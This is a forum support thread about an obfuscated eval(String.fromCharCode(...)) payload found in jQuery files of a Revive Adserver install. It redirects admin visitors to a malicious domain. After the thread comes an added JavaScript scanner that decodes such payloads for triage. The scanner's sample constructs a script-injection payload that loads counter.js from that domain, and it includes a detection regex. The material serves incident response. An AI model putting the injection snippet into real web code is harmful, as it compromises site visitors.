
Malware detected on login for revive administration


Zhivko


Hello everyone,

The company I work for uses Revive Adserver for placing ad banners on its multiple WordPress websites. We detected malware that comes in the form of a redirect after we visit the login screen for the Revive administration (not yet logged in, just the login screen). https://imgur.com/a/f0PVqUM (here is a screenshot of where it happens)

I investigated where this could possibly trigger, and I found out that it happens in the OA_Start($checkRedirectFunc = null) function after this line:

phpAds_SessionDataRegister(OA_Auth::login($checkRedirectFunc));

The $checkRedirectFunc is null at that moment.

Could you help me please?
The link is https://rev.balkanmediagroup.com/www/admin/index.php

Regards,
Zhivko


I found the malicious code. It was in assets/js/jquery-1.2.3.js and assets/js/jquery-1.2.6-mod.js in the form of:

eval(String.fromCharCode(<BUNCH OF INTEGERS SEPARATED BY COMMAS HERE>)), which translates to malicious code that sets the location source to "news.weatherplllatform.com", which injects two JavaScript scripts into the page, counter.js and stat.js, which set some cookies and so on.
I removed the code from the jquery-1.2.6-mod.js that is used, but if you want I can revert it, because I saved a backup .bak file of it.
For investigation purposes on our end, I left the jquery-1.2.3.js as it is (with the malicious code in it).

Please let me know if I should provide anything else, or if I should revert the malicious code so you can check whether it came from your side somehow, and if not, confirm that to us so we can rule that out and continue our investigation in more depth.

Regards,
Zhivko

Just to clarify: since I removed the malicious code from jquery-1.2.6-mod.js, you are no longer able to experience the redirect.
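The post above describes the payload only as eval(String.fromCharCode(...)) followed by a long list of integers. A practitioner triaging a compromised install wants to read that payload without executing it, and to sweep every .js file in the deployment for the same pattern. The following is an added example, not code from the forum post or from the Revive Adserver project: a small static scanner that finds the eval(String.fromCharCode(...)) construct, decodes the character codes into the hidden source, and pulls out the hostnames it references. The sample file contents are constructed inline; the hostname news.weatherplllatform.com and the script name counter.js come from the post, while the exact injected statement is an assumption made so the example runs offline.

```javascript
// Added example: static triage of eval(String.fromCharCode(...)) payloads.
// The payload is decoded, never evaluated, so this is safe to run on a
// suspect file. Nothing here is from the Revive Adserver code base.

// Constructed sample. The payload statement is an assumption; only the
// domain and counter.js are taken from the forum post.
const PAYLOAD_SOURCE =
  'var s=document.createElement("script");' +
  's.src="//news.weatherplllatform.com/counter.js";' +
  'document.head.appendChild(s);';

// Build the obfuscated form the way the attacker's tool would have.
const OBFUSCATED = 'eval(String.fromCharCode(' +
  Array.from(PAYLOAD_SOURCE, ch => ch.charCodeAt(0)).join(',') + '));';

// A jQuery-like file with the payload appended as its last line.
const SAMPLE_FILE = [
  '/*! jQuery v1.2.6 (constructed stand-in for the real library) */',
  '(function(){ var jQuery = window.jQuery = function(a, c) { return a; }; })();',
  OBFUSCATED,
].join('\n');

// Matches eval( String.fromCharCode( 1,2,3 ) ) with arbitrary whitespace.
// It deliberately only catches this direct form; payloads that first store
// the code list in a variable need a second pass or manual review.
const EVAL_FROMCHARCODE =
  /eval\s*\(\s*String\.fromCharCode\s*\(\s*([0-9\s,]+)\)\s*\)/g;

// Turn "104,116,116" into the string it encodes, without eval.
function decodeCharCodes(list) {
  return list
    .split(',')
    .map(s => s.trim())
    .filter(Boolean)
    .map(n => String.fromCharCode(Number(n)))
    .join('');
}

// Return every obfuscated eval in the source with its 1-based line number
// and decoded payload.
function findObfuscatedEval(source) {
  const hits = [];
  for (const m of source.matchAll(EVAL_FROMCHARCODE)) {
    const line = source.slice(0, m.index).split('\n').length;
    hits.push({ line, decoded: decodeCharCodes(m[1]) });
  }
  return hits;
}

// Collect hostnames referenced by a decoded payload (string extraction only,
// nothing is fetched) so they can be blocked or searched for in proxy logs.
function extractHosts(decoded) {
  const hosts = new Set();
  const re = /(?:https?:)?\/\/([a-z0-9.-]+\.[a-z]{2,})/gi;
  for (const m of decoded.matchAll(re)) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

// Full scan of one file's contents: locations, decoded code, contacted hosts.
function scan(source) {
  return findObfuscatedEval(source).map(h => ({ ...h, hosts: extractHosts(h.decoded) }));
}

console.log(JSON.stringify(scan(SAMPLE_FILE), null, 2));
```

Run the scan over the contents of every .js file under the web root, not only the two files named in the post, since the same injection tends to be applied to several libraries at once. The decoded output is evidence, not a cleanup: the reliable fix is to replace each affected library with the copy from the matching Revive Adserver release archive and compare file hashes, and to treat the write access that put the payload there as the actual incident to investigate.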
